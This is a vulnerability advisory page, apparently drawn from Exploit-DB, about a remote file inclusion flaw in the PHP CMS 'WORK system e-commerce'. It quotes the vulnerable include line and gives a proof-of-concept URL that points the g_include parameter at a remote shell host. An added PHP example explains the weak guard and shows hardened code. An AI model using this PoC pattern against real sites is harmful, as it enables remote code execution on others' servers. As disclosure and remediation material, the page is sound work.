vendor: WORK system e-commerce
by: Rodrigo Duarte
CVSS: N/A
HIGH
Inclusion Vulnerability
CWE: 98
Product Name: WORK system e-commerce
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Inclusion Vulnerability in WORK system e-commerce

The WORK system e-commerce PHP application, a content management system (CMS) for e-commerce, contains a file inclusion vulnerability in the script 'include_top.php'. The script uses the 'g_include' URL parameter as the prefix of an include path, so an attacker can include arbitrary files by manipulating that parameter. A proof-of-concept (PoC) URL appears in the raw advisory below. Exploitation can lead to execution of malicious code or disclosure of sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to properly validate and sanitize user input before including any files. Additionally, it is important to implement access controls and restrict the inclusion of files to trusted sources only.
Source

Exploit-DB raw data:

#####################################################################################
Rodrigo Duarte
Wuefez[AT]2die4.com ;D

WORK system e-commerce:

WORK PHP,Mysql content management system CMS e-commerce or not : ajax, workflow,
content,package,language,currency,country,price,stock,group user,CSS,banner,logo,
link,partner,forum,new,FAQ,event,calendar,invoice,mailing,supplier,RSS, webservices.

Vulnerable Script:

~ include_top.php
(Other scripts of this project are also vulnerable with $g_include)

Vulnerable Code:

include ($g_include."include_logo.php");

PoC:

http://example/[WORK_system_path]/include/include_top.php?g_include=http://shell

d0rk:

[your_creativity_here]

greetz:

Cocada, FoNSECA, maxim noob
SHiKaA, ZeUsSixSixSix, Arthurcmc
pizzer, rmeira and darkers.com.br
and for all the rest, i miss.........

EOF:

BRAZILIAN RAQUER!
MAGIC PEOPLE, VOODOO PEOPLE!

#####################################################################################

defined('G_SESSION_OR_COOKIE') or header( "Location: index.php" );
if ( !isset($g_db_prefix) ) header( "Location: index.php" );

The above isn't the correct way to block inclusions.

# milw0rm.com [2007-03-10]
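
Why the two guard lines quoted at the end of the advisory do not stop the inclusion, next to a hardened form. This is an added example, not code from WORK system or from the advisory's author; `WORK_ENTRY`, `weak_guard`, `strict_guard`, `resolve_include` and the allowlist entry `include_menu.php` are hypothetical names.

```php
<?php
// Added illustration (constructed); helper and constant names are hypothetical.

// Guard as quoted in the advisory: header() only queues a redirect header.
// Without exit the script keeps running and reaches include().
function weak_guard(array $vars): string {
    if (!isset($vars['g_db_prefix'])) {
        header('Location: index.php');
    }
    return 'still running: include() would execute next';
}

// Hardened guard for an include-only file: terminate, do not merely redirect.
function strict_guard(): void {
    if (!defined('WORK_ENTRY')) {   // constant set only by the real entry point
        http_response_code(403);
        exit('direct access denied');
    }
}

// Hardened include: fixed base directory plus an allowlist of file names,
// so no request-controlled prefix such as $g_include reaches include().
function resolve_include(string $name): string {
    $allowed = ['include_logo.php', 'include_menu.php']; // constructed list
    if (!in_array($name, $allowed, true)) {
        throw new InvalidArgumentException('include not allowed');
    }
    return __DIR__ . '/' . $name;
}

// Demo, runnable with the PHP CLI.
$afterWeakGuard = weak_guard([]);             // g_db_prefix missing
echo $afterWeakGuard, PHP_EOL;

define('WORK_ENTRY', true);                   // what index.php would do
strict_guard();                               // passes only because of define()
echo resolve_include('include_logo.php'), PHP_EOL;

try {
    resolve_include('http://host.invalid/x'); // constructed untrusted value
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

Keeping `allow_url_include` off in php.ini blocks URL-based includes as a second layer, but local paths still need the fixed base directory and allowlist shown here.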